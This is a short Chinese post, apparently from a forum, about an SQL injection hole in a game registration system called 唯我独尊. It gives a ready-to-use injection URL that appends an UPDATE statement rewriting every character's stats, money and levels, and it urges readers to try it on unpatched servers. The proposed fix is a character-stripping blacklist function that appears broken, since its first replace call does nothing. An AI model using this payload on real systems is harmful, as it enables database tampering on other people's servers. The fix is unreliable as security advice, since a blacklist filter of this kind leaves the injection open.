SQL注入法BUG+解决办法

SQL注入法BUG+解决办法

SQL注入:命令如下不信可以去试试,找个唯我独尊的注册系统没修改过的就能黑

http://xxx.xxxx.xxx/top100.asp?sx=energy;update character set strength=1,dexterity=1,energy=1,vitality=1,money=-1414141414,pktime=5000,clevel=9999,pkcount=100,pklevel=100 where strength>1;--

解决方法在 conn.asp 中加入
function CheckStr(str)
str=replace(str,"","")
str=replace(str,"=","")
str=replace(str,";","")
str=replace(str,">","")
str=replace(str,"<","")
str=replace(str,"%","")
CheckStr=str
end function